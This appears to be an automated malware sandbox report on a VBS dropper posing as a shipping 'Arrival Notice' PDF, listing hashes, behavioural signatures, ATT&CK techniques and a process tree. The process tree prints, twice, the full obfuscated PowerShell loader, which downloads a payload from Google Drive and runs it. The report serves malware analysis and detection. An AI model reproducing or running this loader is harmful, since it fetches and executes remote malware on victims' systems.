c40b2c40c1c0e82ecb066104d4208dad25f3af04dff98a9463cfe5ed82707ef4

General

Target

Arrival Notice_AWB 4560943391_PDF.vbs
Size

29KB
MD5

592e05d52785ac7ce91bedee1bed070a
SHA1

fd7c461e71a467deaff4ef320482685347077943
SHA256

ff3261173380df6010b5f2fec463df92180220c8ae6631637937b097b73af3f1
SHA512

def9b1a31ccaa1942d7e0b0de4949bc94216aaf17622ec2de9c90b30e9cf50ae658da07e428985ae5a0aed60f9913937ed5fce5747d0ae61703894afbf3dc9c4
SSDEEP

384:YzMKK76JtZpa/CQnG5daT7K5NV3mMEMRtkRExJ:YzMKHJtZpa/lnZT2NxmMzk6

Score

8^/10

discovery

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
2	4252	WScript.exe
3	1500	powershell.exe
5	1500	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
1	drive.google.com
3	drive.google.com
12	drive.google.com

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2484	powershell.exe
780	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2484 set thread context of 780	2484	powershell.exe	88

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wab.exe

System Time Discovery 1 TTPs 2 IoCs

Adversary may gather the system time and/or time zone settings from a local or remote system.

discovery

System Time Discovery

T1124

pid	Process
1500	powershell.exe
2484	powershell.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
1500	powershell.exe
1500	powershell.exe
2484	powershell.exe
2484	powershell.exe
2484	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2484	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1500	powershell.exe
Token: SeDebugPrivilege	2484	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 4252 wrote to memory of 1500	4252	WScript.exe	82
PID 4252 wrote to memory of 1500	4252	WScript.exe	82
PID 1500 wrote to memory of 2148	1500	powershell.exe	84
PID 1500 wrote to memory of 2148	1500	powershell.exe	84
PID 1500 wrote to memory of 2484	1500	powershell.exe	86
PID 1500 wrote to memory of 2484	1500	powershell.exe	86
PID 1500 wrote to memory of 2484	1500	powershell.exe	86
PID 2484 wrote to memory of 952	2484	powershell.exe	87
PID 2484 wrote to memory of 952	2484	powershell.exe	87
PID 2484 wrote to memory of 952	2484	powershell.exe	87
PID 2484 wrote to memory of 780	2484	powershell.exe	88
PID 2484 wrote to memory of 780	2484	powershell.exe	88
PID 2484 wrote to memory of 780	2484	powershell.exe	88
PID 2484 wrote to memory of 780	2484	powershell.exe	88
PID 2484 wrote to memory of 780	2484	powershell.exe	88

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Arrival Notice_AWB 4560943391_PDF.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:4252
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "write 'Emotionalization Polariteten Markedsadgang Amtssygehusene Overboil Diatherm Hyostylic212 frromantiske Unawkwardly Spiniferous zephyranthes adjection Unsittingly Forstudier185 Insapiency Kontoruddannet Salonkommunisten Fumy Bipolarises39 Opremsningen Fderalistens skvatmllen Unbackboarded boligtilsynsbestemmelse Emotionalization Polariteten Markedsadgang Amtssygehusene Overboil Diatherm Hyostylic212 frromantiske Unawkwardly Spiniferous zephyranthes adjection Unsittingly Forstudier185 Insapiency Kontoruddannet Salonkommunisten Fumy Bipolarises39 Opremsningen Fderalistens skvatmllen Unbackboarded boligtilsynsbestemmelse';If (${host}.CurrentCulture) {$Cardplayingmmun='SUBsTR';$Askegraa++;}$Cardplayingmmun+='ing';Function Alcmena($Praisable){$Eksamensprojektet=$Praisable.Length-$Askegraa;For( $Cardplaying=2;$Cardplaying -lt $Eksamensprojektet;$Cardplaying+=3){$Emotionalization+=$Praisable.$Cardplayingmmun.Invoke( $Cardplaying, $Askegraa);}$Emotionalization;}function Bloatedness($begyndelsesbogstaver){ & ($Snoldendes) ($begyndelsesbogstaver);}$Repercussor=Alcmena '.mM,ioBlzB,iAslPllDia.t/ .5Ak.P.0.i .u(AkWS.i n IdOroKlwF s Y UnNFyTLa T 1Il0 . n0To;Ka KrWViiT nCo6 E4 C;Ba Kx i6,e4 K;Kv Epr Av B:Be1,t2 1Bl.,u0 F)Pr BoG Sepuc VkTeoSj/je2An0Or1C.0 n0.o1 e0S 1Ou M,F .iAurKveRef,voRyxSk/Ao1B,2In1 K.B 0m. ';$Scaphandridae=Alcmena 'InUM.sUdeCrrVe-RiAMagcaeEmnVvtDr ';$Overboil=Alcmena 'TrhTet Rt SpBrs :Wr/ ,/Bad,erGeiHuv MeA .,igSloMio,rg Kl.oeJe..ic.roC.m E/bauDmc .?SpeUlx .pDeoStrVit =,vdBloryw Mn elAvo paAsdPo&SoiMedS.=No1BrvS.MNeY pmHyL.r7C hMuhAfs.oe,l3ChOfaVFi-Tr_As3.il.avBl5amxu,hBeBUnTDov,ojCuk esAnL.l0PrrScG ,GFl ';$Toreadorer=Alcmena 'In>Un ';$Snoldendes=Alcmena ' ,iOre.nx a ';$Komplementere='frromantiske';$Orthodoxism = Alcmena 'AnealcS,h .o,e P % MaAfpDipbidDea AtChaDe%Mm\ FFEso Cr PuBurOvePanKoiS nScgPrsKakDio.rnNoo ,mS iFoeStnResSt..vARekPut,e A & ,& S AdeC,c AhUnoF .t I ';Bloatedness (Alcmena ' G$c.g Kl Fo bS,a.plSk:MagR,rKeaGan BaSkdA.o =M (BocStmAnd.a me/ gc N U$ocO ,rUdtP.hTao bdInoRuxLai,isDem .) ');Bloatedness (Alcmena 'Re$NugSal ToBib AaFllT :HaA ,mAlt RsDesBey FgSheU.h buOusWae Pn .eE,=Te$ SO ,vQ,eRerFabTeoFoiDelR .kasvepSpl iSptUd(A.$AmTF,o,er ,e .a .dOvoChrDeeH.r.e)Vi ');Bloatedness (Alcmena ' .[ .NL,e.ut .HuSMueRerKavSyiSic Ae,aP Bo.gi MnAnt WM .aUhnHaaungBee r T] K: :OmSafeKoc .uM,rU i KtG,yMoP.irPooS.tU oC,cLeo,clLo T,=,t Bn[FjNs,e St U.,oSR,e McAau.orShiTrt yT PR,rOmoMit .o VcGeoW.l aT byPepK.e.a]Le:J,:OpTS l is e1Ny2,m ');$Overboil=$Amtssygehusene[0];$Antimediaevally= (Alcmena ' C$ ,gColInokdbScaFjlM :InNMar ,sBlyP,nPhe StTrhSheCod ,s.e=E,N .e.hwA -FrOF,bChjd e scU.t C n SClyYasFrtKoeOvmEm.RoNUneuntBa.BaW e UbEuC l ri Ge n t');$Antimediaevally+=$granado[1];Bloatedness ($Antimediaevally);Bloatedness (Alcmena 'Re$RaN ,rBasBryAvnSmeaptRehSheBydA sbr.TwH ZeApaBod DeSerDisLy[.n$LuSF.c,ta CpBlhSnaGanStdStrEniWodBaa nep ]Ge=Ve$,rR ieHip,ue DrPrcHeuKls is roT rUp ');$Towers=Alcmena ',a$TiNDer sK,yStnKve Pt ThEpe PdF.s C.LaD Ro sw,unCrlB.oDiaNud.xF .i ElSie .(Fa$,eOSkvIse r Eb VoTyiTel .,Di$ s gk bvA.a tComv lNalChe Sn P) O ';$skvatmllen=$granado[0];Bloatedness (Alcmena ' a$OugB lFro bHaaB.lD,:EjMS.aKrd,ir,iaStsCyiGe=In( HTMeeStsSktG,-.sPChaSitKrhSk Ti$PaslikHjv aC t BmBulVel .eAdnPl)Na ');while (!$Madrasi) {Bloatedness (Alcmena ' ,$TagLelCeoWib,raPllDe:RobRarLouH,n Pe tTv=Fo$Opt rSpuFrePy ') ;Bloatedness $Towers;Bloatedness (Alcmena 'caSDet LagarOvtB,- TS lPeeN,e.vpGa .r4.m ');Bloatedness (Alcmena '.n$FigOdlNeoNab ,a l c:T MFaaD,dSirMaaTasS iAg=Di(KiTPre osM.tG,- APDaaKrt Nh t H $Rhs.nkL,vsta PtLnm Pli lPoe.lnL.) ') ;Bloatedness (Alcmena 'U,$AcgBelOmo Wb BaDulCh:T.M ua Grenk yeFod UsHya Od ogA.aScnUng k=ge$.pg AlB o Db,oa lPe: .PGaoKjlBlaFrrDiiSktviesuth,eStnMa+ B+Vi%Fo$ MA.rmT t,rs ,s,iyWig.te GhTeu TsSkeStnFle .L cHeo RuS n,etKa ') ;$Overboil=$Amtssygehusene[$Markedsadgang];}$Voksenundervisning=295672;$Trodsedes=27606;Bloatedness (Alcmena 'Mu$,igtulChoFobtaaiol A:B UE.nKrai.wHekW.wUnaElrZedu lBlyT, A =N. ExGDeeMetfi-I.C EoStnmatSte YnIntAr .a$SksDak ivNeaDyt.emL,l dl IeamnJo ');Bloatedness (Alcmena 'A,$,og,al ,oL,bchaA lAl:oxBperFoaKuu dn aa.t Sp=Pr Fl[,rS ,y,rs NtUne,imt..GrCCro cnR vFoeUnrPet o],e: S:SvF Vrt oP.mFoB,ia Usove K6Ma4LeS .tE,rFii n ogOc(di$ FU.vn ,a IwWik .wS,aLgr.rdSil rySe) T ');Bloatedness (Alcmena ' g$EmgEnlFao.yb AaAgl S:Toas.d,ajAre,icDet DiTno,an.e .o=Pe Br[ReS yWhsUdtEleCrmFj.noT.ye Ex atBr.PaE rn .c ,o sdMiiG,n,vgPr] e: :omATrS KC .I uIE..RaG OeFatHeSPatR rL,iFanK gIn(Vo$FuBVarUnaPyuU nOuaBe),a ');Bloatedness (Alcmena 'R,$OcgGul.noPtbUnaGol B:.aE .f.at retrr,ra aC.r As Tj .vMinUnd,ogE nShsTo= S$Doa NdArjZeeB.cI t,oiIno .nGy.Ans.ou ib PsCotSnrVoiCanvegAn(Fi$ DV To CkTes,oeMan VuManUddUneInrG.vOpiRes nn.aiC.nPag ,,De$P.T ,rNao FdInsDuedidTreUdsB.) F ');Bloatedness $Efteraarsjvndgns;"
  2⤵
  - Blocklisted process makes network request
  - System Time Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1500
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Forureningskonomiens.Akt && echo t"
    3⤵
    PID:2148
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "write 'Emotionalization Polariteten Markedsadgang Amtssygehusene Overboil Diatherm Hyostylic212 frromantiske Unawkwardly Spiniferous zephyranthes adjection Unsittingly Forstudier185 Insapiency Kontoruddannet Salonkommunisten Fumy Bipolarises39 Opremsningen Fderalistens skvatmllen Unbackboarded boligtilsynsbestemmelse Emotionalization Polariteten Markedsadgang Amtssygehusene Overboil Diatherm Hyostylic212 frromantiske Unawkwardly Spiniferous zephyranthes adjection Unsittingly Forstudier185 Insapiency Kontoruddannet Salonkommunisten Fumy Bipolarises39 Opremsningen Fderalistens skvatmllen Unbackboarded boligtilsynsbestemmelse';If (${host}.CurrentCulture) {$Cardplayingmmun='SUBsTR';$Askegraa++;}$Cardplayingmmun+='ing';Function Alcmena($Praisable){$Eksamensprojektet=$Praisable.Length-$Askegraa;For( $Cardplaying=2;$Cardplaying -lt $Eksamensprojektet;$Cardplaying+=3){$Emotionalization+=$Praisable.$Cardplayingmmun.Invoke( $Cardplaying, $Askegraa);}$Emotionalization;}function Bloatedness($begyndelsesbogstaver){ & ($Snoldendes) ($begyndelsesbogstaver);}$Repercussor=Alcmena '.mM,ioBlzB,iAslPllDia.t/ .5Ak.P.0.i .u(AkWS.i n IdOroKlwF s Y UnNFyTLa T 1Il0 . n0To;Ka KrWViiT nCo6 E4 C;Ba Kx i6,e4 K;Kv Epr Av B:Be1,t2 1Bl.,u0 F)Pr BoG Sepuc VkTeoSj/je2An0Or1C.0 n0.o1 e0S 1Ou M,F .iAurKveRef,voRyxSk/Ao1B,2In1 K.B 0m. ';$Scaphandridae=Alcmena 'InUM.sUdeCrrVe-RiAMagcaeEmnVvtDr ';$Overboil=Alcmena 'TrhTet Rt SpBrs :Wr/ ,/Bad,erGeiHuv MeA .,igSloMio,rg Kl.oeJe..ic.roC.m E/bauDmc .?SpeUlx .pDeoStrVit =,vdBloryw Mn elAvo paAsdPo&SoiMedS.=No1BrvS.MNeY pmHyL.r7C hMuhAfs.oe,l3ChOfaVFi-Tr_As3.il.avBl5amxu,hBeBUnTDov,ojCuk esAnL.l0PrrScG ,GFl ';$Toreadorer=Alcmena 'In>Un ';$Snoldendes=Alcmena ' ,iOre.nx a ';$Komplementere='frromantiske';$Orthodoxism = Alcmena 'AnealcS,h .o,e P % MaAfpDipbidDea AtChaDe%Mm\ FFEso Cr PuBurOvePanKoiS nScgPrsKakDio.rnNoo ,mS iFoeStnResSt..vARekPut,e A & ,& S AdeC,c AhUnoF .t I ';Bloatedness (Alcmena ' G$c.g Kl Fo bS,a.plSk:MagR,rKeaGan BaSkdA.o =M (BocStmAnd.a me/ gc N U$ocO ,rUdtP.hTao bdInoRuxLai,isDem .) ');Bloatedness (Alcmena 'Re$NugSal ToBib AaFllT :HaA ,mAlt RsDesBey FgSheU.h buOusWae Pn .eE,=Te$ SO ,vQ,eRerFabTeoFoiDelR .kasvepSpl iSptUd(A.$AmTF,o,er ,e .a .dOvoChrDeeH.r.e)Vi ');Bloatedness (Alcmena ' .[ .NL,e.ut .HuSMueRerKavSyiSic Ae,aP Bo.gi MnAnt WM .aUhnHaaungBee r T] K: :OmSafeKoc .uM,rU i KtG,yMoP.irPooS.tU oC,cLeo,clLo T,=,t Bn[FjNs,e St U.,oSR,e McAau.orShiTrt yT PR,rOmoMit .o VcGeoW.l aT byPepK.e.a]Le:J,:OpTS l is e1Ny2,m ');$Overboil=$Amtssygehusene[0];$Antimediaevally= (Alcmena ' C$ ,gColInokdbScaFjlM :InNMar ,sBlyP,nPhe StTrhSheCod ,s.e=E,N .e.hwA -FrOF,bChjd e scU.t C n SClyYasFrtKoeOvmEm.RoNUneuntBa.BaW e UbEuC l ri Ge n t');$Antimediaevally+=$granado[1];Bloatedness ($Antimediaevally);Bloatedness (Alcmena 'Re$RaN ,rBasBryAvnSmeaptRehSheBydA sbr.TwH ZeApaBod DeSerDisLy[.n$LuSF.c,ta CpBlhSnaGanStdStrEniWodBaa nep ]Ge=Ve$,rR ieHip,ue DrPrcHeuKls is roT rUp ');$Towers=Alcmena ',a$TiNDer sK,yStnKve Pt ThEpe PdF.s C.LaD Ro sw,unCrlB.oDiaNud.xF .i ElSie .(Fa$,eOSkvIse r Eb VoTyiTel .,Di$ s gk bvA.a tComv lNalChe Sn P) O ';$skvatmllen=$granado[0];Bloatedness (Alcmena ' a$OugB lFro bHaaB.lD,:EjMS.aKrd,ir,iaStsCyiGe=In( HTMeeStsSktG,-.sPChaSitKrhSk Ti$PaslikHjv aC t BmBulVel .eAdnPl)Na ');while (!$Madrasi) {Bloatedness (Alcmena ' ,$TagLelCeoWib,raPllDe:RobRarLouH,n Pe tTv=Fo$Opt rSpuFrePy ') ;Bloatedness $Towers;Bloatedness (Alcmena 'caSDet LagarOvtB,- TS lPeeN,e.vpGa .r4.m ');Bloatedness (Alcmena '.n$FigOdlNeoNab ,a l c:T MFaaD,dSirMaaTasS iAg=Di(KiTPre osM.tG,- APDaaKrt Nh t H $Rhs.nkL,vsta PtLnm Pli lPoe.lnL.) ') ;Bloatedness (Alcmena 'U,$AcgBelOmo Wb BaDulCh:T.M ua Grenk yeFod UsHya Od ogA.aScnUng k=ge$.pg AlB o Db,oa lPe: .PGaoKjlBlaFrrDiiSktviesuth,eStnMa+ B+Vi%Fo$ MA.rmT t,rs ,s,iyWig.te GhTeu TsSkeStnFle .L cHeo RuS n,etKa ') ;$Overboil=$Amtssygehusene[$Markedsadgang];}$Voksenundervisning=295672;$Trodsedes=27606;Bloatedness (Alcmena 'Mu$,igtulChoFobtaaiol A:B UE.nKrai.wHekW.wUnaElrZedu lBlyT, A =N. ExGDeeMetfi-I.C EoStnmatSte YnIntAr .a$SksDak ivNeaDyt.emL,l dl IeamnJo ');Bloatedness (Alcmena 'A,$,og,al ,oL,bchaA lAl:oxBperFoaKuu dn aa.t Sp=Pr Fl[,rS ,y,rs NtUne,imt..GrCCro cnR vFoeUnrPet o],e: S:SvF Vrt oP.mFoB,ia Usove K6Ma4LeS .tE,rFii n ogOc(di$ FU.vn ,a IwWik .wS,aLgr.rdSil rySe) T ');Bloatedness (Alcmena ' g$EmgEnlFao.yb AaAgl S:Toas.d,ajAre,icDet DiTno,an.e .o=Pe Br[ReS yWhsUdtEleCrmFj.noT.ye Ex atBr.PaE rn .c ,o sdMiiG,n,vgPr] e: :omATrS KC .I uIE..RaG OeFatHeSPatR rL,iFanK gIn(Vo$FuBVarUnaPyuU nOuaBe),a ');Bloatedness (Alcmena 'R,$OcgGul.noPtbUnaGol B:.aE .f.at retrr,ra aC.r As Tj .vMinUnd,ogE nShsTo= S$Doa NdArjZeeB.cI t,oiIno .nGy.Ans.ou ib PsCotSnrVoiCanvegAn(Fi$ DV To CkTes,oeMan VuManUddUneInrG.vOpiRes nn.aiC.nPag ,,De$P.T ,rNao FdInsDuedidTreUdsB.) F ');Bloatedness $Efteraarsjvndgns;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - System Time Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2484
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Forureningskonomiens.Akt && echo t"
      4⤵
      System Location Discovery: System Language Discovery
      PID:952
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      PID:780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

System Time Discovery

1

T1124

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kyri4kdd.o3f.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Forureningskonomiens.Akt

Filesize
420KB

MD5
8dedf31a9ddcc727db8c1c7f42074980

SHA1
2e027edef136505bb0f62347dda5d10611fe434f

SHA256
548990f3282f20086d8b67f93b83b3068e12204ad13450b784b06bbad05406f4

SHA512
17ec95dc43d573cbaa0d991a6c30499b9aefb3edb69bef225515a981500a034d0a13179178c3d697e904a57e34f0b04cac95b949d27b0c00f8999cd4c2a99f92

Download Submit
memory/1500-2-0x00007FFA100D3000-0x00007FFA100D5000-memory.dmp

Filesize
8KB

Download
memory/1500-12-0x00007FFA100D0000-0x00007FFA10B92000-memory.dmp

Filesize
10.8MB

Download
memory/1500-11-0x0000017286390000-0x00000172863B2000-memory.dmp

Filesize
136KB

Download
memory/1500-13-0x00007FFA100D0000-0x00007FFA10B92000-memory.dmp

Filesize
10.8MB

Download
memory/1500-14-0x00007FFA100D0000-0x00007FFA10B92000-memory.dmp

Filesize
10.8MB

Download
memory/1500-41-0x00007FFA100D0000-0x00007FFA10B92000-memory.dmp

Filesize
10.8MB

Download
memory/1500-40-0x00007FFA100D3000-0x00007FFA100D5000-memory.dmp

Filesize
8KB

Download
memory/2484-21-0x0000000004E10000-0x0000000004E76000-memory.dmp

Filesize
408KB

Download
memory/2484-35-0x0000000006D80000-0x0000000006E16000-memory.dmp

Filesize
600KB

Download
memory/2484-30-0x00000000055E0000-0x0000000005937000-memory.dmp

Filesize
3.3MB

Download
memory/2484-31-0x0000000005AB0000-0x0000000005ACE000-memory.dmp

Filesize
120KB

Download
memory/2484-32-0x0000000005AF0000-0x0000000005B3C000-memory.dmp

Filesize
304KB

Download
memory/2484-33-0x0000000007400000-0x0000000007A7A000-memory.dmp

Filesize
6.5MB

Download
memory/2484-34-0x0000000005FE0000-0x0000000005FFA000-memory.dmp

Filesize
104KB

Download
memory/2484-20-0x0000000004DA0000-0x0000000004E06000-memory.dmp

Filesize
408KB

Download
memory/2484-36-0x0000000006D00000-0x0000000006D22000-memory.dmp

Filesize
136KB

Download
memory/2484-37-0x0000000007A80000-0x0000000008026000-memory.dmp

Filesize
5.6MB

Download
memory/2484-19-0x0000000004C00000-0x0000000004C22000-memory.dmp

Filesize
136KB

Download
memory/2484-39-0x0000000008030000-0x0000000009EFB000-memory.dmp

Filesize
30.8MB

Download
memory/2484-18-0x0000000004FB0000-0x00000000055DA000-memory.dmp

Filesize
6.2MB

Download
memory/2484-17-0x00000000022A0000-0x00000000022D6000-memory.dmp

Filesize
216KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads